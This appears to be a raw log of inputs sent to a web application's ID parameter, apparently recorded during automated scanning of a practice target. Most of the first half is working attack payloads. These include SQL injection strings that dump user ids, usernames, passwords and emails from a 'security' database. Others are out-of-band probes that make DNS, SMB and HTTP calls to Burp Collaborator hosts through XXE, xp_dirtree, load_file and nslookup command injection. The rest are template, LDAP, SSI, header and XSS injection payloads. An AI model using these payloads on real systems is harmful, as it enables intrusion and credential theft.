ID:1' AND (SELECT 2654 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT REPEAT(0x34,1024)),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sfKn'='sfKn
ID:1' AND (SELECT 8348 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT REPEAT(0x32,512)),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pJWS'='pJWS
ID:1' AND (SELECT 3727 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT REPEAT(0x36,256)),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pCdI'='pCdI
ID:1' AND (SELECT 2452 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT REPEAT(0x34,54)),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Xjqc'='Xjqc
ID:1' AND (SELECT 1950 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.emails),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WiHy'='WiHy
ID:1' AND (SELECT 3592 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`email-id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 0,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'cwwO'='cwwO
ID:1' AND (SELECT 7946 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 0,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gqAx'='gqAx
ID:1' AND (SELECT 5112 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`email-id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 1,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'indV'='indV
ID:1' AND (SELECT 5721 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 1,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'EPcZ'='EPcZ
ID:1' AND (SELECT 9545 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`email-id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 2,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'njEe'='njEe
ID:1' AND (SELECT 8481 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 2,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sHob'='sHob
ID:1' AND (SELECT 2855 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`email-id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 3,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JWrT'='JWrT
ID:1' AND (SELECT 7323 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 3,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vxzo'='vxzo
ID:1' AND (SELECT 1457 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`email-id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 4,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lJVj'='lJVj
ID:1' AND (SELECT 9741 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 4,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ddtW'='ddtW
ID:1' AND (SELECT 4970 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`email-id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 5,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'luxl'='luxl
ID:1' AND (SELECT 2371 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 5,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MjqG'='MjqG
ID:1' AND (SELECT 9567 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`email-id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 6,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'LqMr'='LqMr
ID:1' AND (SELECT 1553 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 6,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qBxn'='qBxn
ID:1' AND (SELECT 1943 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`email-id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 7,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mKQS'='mKQS
ID:1' AND (SELECT 6110 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT MID((IFNULL(CAST(`id` AS NCHAR),0x20)),1,54) FROM `security`.emails ORDER BY `id` LIMIT 7,1),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vIhZ'='vIhZ
ID:1
ID:-8870' UNION ALL SELECT NULL,CONCAT(0x7171767671,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x71706b7871),NULL FROM `security`.users-- -
ID:-8841' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 0,1),NULL-- -
ID:-3220' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 1,1),NULL-- -
ID:-6366' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 2,1),NULL-- -
ID:-9013' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 3,1),NULL-- -
ID:-7944' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 4,1),NULL-- -
ID:-8658' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 5,1),NULL-- -
ID:-6651' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 6,1),NULL-- -
ID:-2366' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 7,1),NULL-- -
ID:-7305' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 8,1),NULL-- -
ID:-8169' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 9,1),NULL-- -
ID:-8199' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 10,1),NULL-- -
ID:-2196' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 11,1),NULL-- -
ID:-1785' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`password` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(username AS NCHAR),0x20),0x71706b7871) FROM `security`.users ORDER BY `id` LIMIT 12,1),NULL-- -
ID:1
ID:2
ID:2'
ID:1'
ID:1"
ID:1
ID:2
ID:1'
ID:10
ID:10
ID:1' union select 1,2,3 -- 
ID:1
ID:1
ID:1
ID:rixiub8f81
ID:1sil2pnv8ly
ID:(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % mvpbq SYSTEM "http://dk1ky292je8o2ci1ioohf6nyjppgdj1ao0cp.burpcollab'||'orator.net/">%mvpbq;]>'),'/l') from dual)
ID:1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % mvpbq SYSTEM "http://4glbut5tf54fy3esefk8bxjpfgl79bx2ks8h.burpcollab'||'orator.net/">%mvpbq;]>'),'/l') from dual)||'
ID:1;declare @q varchar(99);set @q='\\il7pz7a7kj9t3hj6jtpmgbo3kuqlec40vnlba.burpcollab'+'orator.net\joy'; exec master.dbo.xp_dirtree @q;-- 
ID:1';declare @q varchar(99);set @q='\\503ceupuz6ogi4ytyg49vy3qzh58tzknba1yq.burpcollab'+'orator.net\uct'; exec master.dbo.xp_dirtree @q;-- 
ID:1);declare @q varchar(99);set @q='\\5v1c9ukuu6jgd4tttgz9qyyquh08ozgn7axym.burpcollab'+'orator.net\kxp'; exec master.dbo.xp_dirtree @q;-- 
ID:1');declare @q varchar(99);set @q='\\yqs54nfnpze98xomo9u2lrtjpav1jscg33tri.burpcollab'+'orator.net\tsd'; exec master.dbo.xp_dirtree @q;-- 
ID:(select load_file('\\\\ioap27d7njct6hm6mtsmjbr3nutlhcj0an0bp.burpcollaborator.net\\pwd'))
ID:1'+(select load_file('\\\\an1h1zczmbbl59lyllrei3qvmmsdg4jsaf03p.burpcollaborator.net\\god'))+'
ID:1 into outfile '\\\\tvs09ikiuuj4dstht4zxqmyeu50wonsbjy9my.burpcollaborator.net\\alw'; -- 
ID:1'
ID:1'
ID:1
ID:1''
ID:eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))
ID:g7onl5w56hvrpf545rbk29a16scj0bo2bszh.burpcollaborator.net
ID:http://tgd0ui5ifu44ysehe4kxbmjef5lw9mxdk38s.burpcollaborator.net/?1
ID:jcs93${553*971}yp6yh
ID:ot50g{{980*871}}scwp2
ID:1}}z2pbv'/"<jzg85
ID:1%}ke1de'/"<d4zm1
ID:1oz9fy%>b87kr'/"<hwkco
ID:1|nslookup -q=cname ra5yogzg9sy2sq8f82ev5kdc93fu3qrhe72w.burpcollaborator.net.&
ID:1'"`0&nslookup -q=cname xz04dmomyyn8hwxlx831uq2iy940sxgo3er3.burpcollaborator.net.&`'
ID:1&nslookup -q=cname 10z8eqpqz2oci0ypyc45vu3mzd54tzhq4gs5.burpcollaborator.net.&'\"`0&nslookup -q=cname 10z8eqpqz2oci0ypyc45vu3mzd54tzhq4gs5.burpcollaborator.net.&`'
ID:1|echo cr3svjtnvt 8eemxtsnep||a #' |echo cr3svjtnvt 8eemxtsnep||a #|" |echo cr3svjtnvt 8eemxtsnep||a #
ID:1&echo j8813cl48a 4s7ylvl8sk&
ID:1"|echo zl6hrs3ith 97m4hhhfkt ||
ID:1'|echo 394z1aplyo tx0fj7h2oc #xzwx
ID:5yv9xxr48s)(objectClass=*
ID:gich69axup)(!(objectClass=*)
ID:huk639nsun)(!(!(objectClass=*))
ID:*)(objectClass=*
ID:*)(!(objectClass=*)
ID:<ekn xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://3mqa0sbsl4ae42krkeq7hwpolfr6f63xqnec.burpcollaborator.net/ekn.xsd">ekn</ekn>
ID:<plt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://5hncvu6ug65gz4ftfgl9cykqghm8a9y0lq9f.burpcollaborator.net/foo"/></plt>
ID:1]]>><
ID:(function(){if(typeof tf4sm==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);tf4sm=1;}}())
ID:1'+(function(){if(typeof p9qlo==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);p9qlo=1;}}())+'
ID:"-->'-->`--><!--#set var="z9y" value="y8x5mnxn7z"--><!--#set var="1b0" value="0az7opzp91"--><!--#echo var="z9y"--><!--#echo var="1b0"--><!--#exec cmd="nslookup -q=cname lvks9akaumjwdkt9twzpqey6ux0oogm4dr3fs.burpcollaborator.net" -->
ID:1
BCC:xop42mdmnyc86wmlm8s1jqrin9t0hsag13rrg@burpcollaborator.net
cac: q
ID:1>
BCC:zcf6qo1ob00auyanaag37sfkbbh25uziq5gt5@burpcollaborator.net
paf: i
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1'+(select load_file('\\\\1xz8bqmqw2lcf0vpvc15su0mwd24qvtjk6auz.burpcollaborator.net\\gna'))+'
ID:1
ID:wff3tl4lex37xvdkd7j0apihe8kz8r0fr2hq6
ID:'"><svg/onload=(new(Image)).src='//zgj6uo5of04ayyeneak3bsjkfbl29uziq5gt5\56burpcollaborator.net'>
ID:javascript:/*</script><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+((new(Image)).src=([]+/\/afthtz4zeb3lx9dydljea3ivemkd85ztqgg45\.burpcollaborator.net/).replace(/\\/g,[]))//'>
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:5
ID:1
ID:2
ID:1
ID:14
ID:15
ID:1
